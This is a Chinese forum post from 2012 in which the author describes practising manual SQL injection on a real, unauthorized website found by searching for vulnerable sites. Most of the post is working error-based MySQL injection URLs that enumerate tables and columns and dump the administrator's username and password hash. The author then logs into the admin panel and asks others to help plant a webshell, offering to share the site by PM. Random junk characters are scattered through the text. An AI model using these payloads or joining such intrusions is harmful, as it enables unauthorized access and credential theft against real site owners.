近一直在学习数据库方面的知识,一直在钻研PHP的一些高级注入语法,感觉比较的有意思。于是就在网上找有洞的网站练习手注。于是有了下文。
) D" ?+ e% `# f9 U" T( ^首先找到网站后台,加了个admin,后台出来了 , a% {* E' L @+ H+ k5 h
8 i5 K/ G" U4 ~/ m) T7 k
3 [+ R7 F# ]/ y F然后看了下网站,发现貌似都是html静态网页,但是通过图片链接发现应该是伪静态,于是在后面加了个 ',报错了,初步判断可以注入
3 n' `6 D7 N3 b: i; Ohttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145843714.jpg 从报错语句中我们可以判断出存在frame_board_conference 表,知道存在frame_board_conference,可以方便我们后面的注入。这里我用的是错误回显注入。 首先查下数据库相关信息。 www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*) from+frame_board_conference+group+by+concat(0x3a,concat(0x3a,database(),0x3a,version()),floor(rand(0)*2)))—" s% T% {* p0 @( v$ q( o
$ i& P ^8 [' c; w$ X3 `. B; Y. T
' \$ j) z/ Q1 t; V9 q1 |3 ?) d8 ~$ R, H
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846722.jpg
7 S( K2 e$ Y4 e" w* I/ d: Z# Q6 u' a/ J: F
L; r5 h- G$ T( O2 v2 M0 \
9 M+ b. W2 K( K' O: Q& s v/ `8 {8 k2 R4 C! ~
可以看到数据库版本为5.0.32,存在information_schema表,可以进一步的注入。 然后我们查表 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(table_name),1,150)from+information_schema.tables+where+table_schema=database()),0x3a,floor(rand(0)*2)))-- 得到管理员表段frame_administrator+ ~; |# x8 a0 O+ H
) M/ X" j2 @" `' n! o( ~, ^3 q, g/ l }
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846695.jpg3 `7 e4 C. l( F" Z/ w
9 G( @0 t- ^' y: m; c# ]0 G7 N
B5 p, Y2 [6 `2 Y5 @, T 查字段 http://www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(column_name),1,150)from+information_schema.columns+where+table_name=0x6672616d655f61646d696e6973747261746f72),0x3a,floor(rand(0)*2)))--0 |- S1 P. j, y3 F$ z
5 s {& n6 w1 D! S- }
8 i" h, @* ]# @8 y1 ~% N
1 z9 l$ Z+ ^* N+ X/ @ 得到userID,userPass字段 最后 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(userID,0x3a,userPass,0x0a),1,150)from+frame_administrator),0x3a,floor(rand(0)*2)))--
6 K3 E$ s3 [( s" o, S3 |8 o0 C3 F: j+ V! z( m; y: K/ R& O2 G# y
p6 p7 G/ N7 j4 j
5 X( \- F5 O# K) V2 J& L 得到最终结果admin eb0a191797624dd3a48fa681d3061212 解密后成功进入后台,但是在获得shell的过程中出了点问题,可以穿php但是貌似无法解析,不知道什么原因,本人很菜,在这里希望大牛有兴趣的话帮忙拿下shell,感激不尽。Pm我,我把网址发给你。 | 
发表于 2012-12-20 09:00:35
收藏
支持
反对